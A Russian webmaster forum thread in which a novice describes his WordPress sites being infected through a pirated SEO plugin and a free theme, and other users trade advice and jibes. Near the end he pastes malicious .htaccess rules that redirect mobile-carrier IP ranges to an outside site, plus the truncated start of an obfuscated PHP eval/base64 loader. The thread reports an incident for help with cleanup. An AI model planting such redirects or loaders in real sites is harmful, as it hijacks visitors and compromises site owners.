Jack SparroW

Jack SparroW
Рейтинг
208
Регистрация
06.12.2012
Должность
Капитан
Смекаешь?

Сайт сегодня получил метку от яндекса

На страницах сайта ****.ru обнаружены ссылки на файлы или программы, к которым добавлено дополнительное программное обеспечение. Написал в скайп, ответа нет

The WishMaster:
От двух недель примерно.

НУ это если верить платонам. Сами знаете что они не всегда говорят правду. Мне бы хотелось увидеть реальные примеры

Всем спасибо за ответы. Вирусы удалил. Перевел все сайты на разные аккаунты, написал в яндекс, сказали что в течении двух недель возможно сайт вернет свои позиции! Ждем :)

2. Ты скачал неведомую хрень с помойки.
Разницу не чуешь с лицензионным ДЛЕ? Нет?
Печально. Тогда уже ничего не поможет.

Конечно чувствую, я же писал выше что я нуб и с вотдпресс нет опыта работы, а в ДЛЕ я как дома :)

MrDesigner,

Урок, видать, не прошёл даром. Продолжайте
дальше в том же духе. Главного вы и не
поняли, что вирус был не в CMS, а в палёном
плагине и шаблоне.

Так я про это и писал с самого начала, вы меня не поняли, что вирус был в плагине, но как доказать это яндексу, они то мне написали что я поставил мобильный редирект чтобы денег заработать!

DLE только лицензия, не проблема купить ее за 3000р. когда сайт приносит 40000ежемесячно. И да, сайт был с большим трафиком белый и пушистый.

MrDesigner:
LOL!!! Дважды LOL!!!

А минусуют вас за голословное обвинение:



Разруха в голове у вас. И в руках.

Почему же дважды LOL? Здесь нет ничего смешного что я новичок в этом деле. Каюсь что сам накосячил, скачал из интернета плагин и шаблон. И не проверил файлы.

Благо хостер мой вразумил меня и наставил на путь истинный:

Вы являетесь владельцем услуги хостинга****** .

Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.
Наши рекомендации по решению проблемы: *****

По поводу дырки от бублика - писать кричащие заголовки сеошник должен уметь, вот видите сколько народу проявило любопытство и прочитало)). Кстати за 3 года работы с DLE ни разу не было вирусов.

Всем спасибо за ответы. Подозрительный файл был в плагине, но сам вирус оказался в дизайне (шаблоне) скаченном из интернета. Так что, кто пользуется бесплатными шаблонами, проверяйте, туда кладут вирусы.

А тем кто ставит минусы в репу, зачем? Я создал этот топик для помощи, честно признаюсь что я ничего в этом не понимаю - нуб я. С wordpress столкнулся впервые. Даже не знал куда можно еще обратится.

RAS:
Многие забывают даже темы обновлять. через которые весело и проезжают дотошные детишки.

---------- Добавлено 11.08.2015 в 11:23 ----------

И всегда есть золотое правило - 1 сайт = 1 акк, а не 1 акк = 500 сайтов

Да хорошее правило, сейчас так и сделал. Восстановил бекап сайтов и разместил уже на разных аккаунтах. Посмотрим что скажут ребята из яндекса

Klanser:
Еще манулом сайт прогоните, чтобы яндекс точно видел, что вы встали на праведный путь :)

Спасибо. Самый дельный совет. Так и сделал, даже не знал про такую прогу :)

awasome:
Поверим. Только причем тут вп, если шелл был залит через плагин?

Притом что он давал модифицировать системные файлы. ДА и вообще теперь он мне не нравится 😡

Уж больно легко заражаются wordpress сайты с этими плагинами. Тем, кто, как я не профессионально занимается вебмастерингом, легко попастся на удочку мошенников, распространяющих вирусы под видом плагинов для wordpress.

Плагин

All in One SEO Pack, каюсь, скачал из инета....

MrDesigner:
Зачем вы троллите?

Расскажите уж нам - через какую дырку Вордпресса ломанули движок?

Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).

Через seo плагин был залит шеел. Хостинг сразу же ругался и выдал вирус {CAV}Php.Trojan.StopPost, я его удалить смог только через 2 дня, т.к. область заражения была огромная (десяток сайтов).

htaccess прописывалось следующее:

RewriteCond %{REMOTE_ADDR} ^213\.87\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143)\. [OR]

RewriteRule .* http://warp-master.ru/opera/load/ [L,R]

и далее....

В файлы движков добавлялся php код, и обнаружил неизвестный файл в корне сайта:

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54)."\x34_".chr(100)."".chr(101)."".chr(99)."o\x64e".chr(40)."";$O9654 = "".chr(41)."\x29)".chr(59)."";$jlvpdR6408 = $Gcwa9593."'TZxXr.

Всего: 1573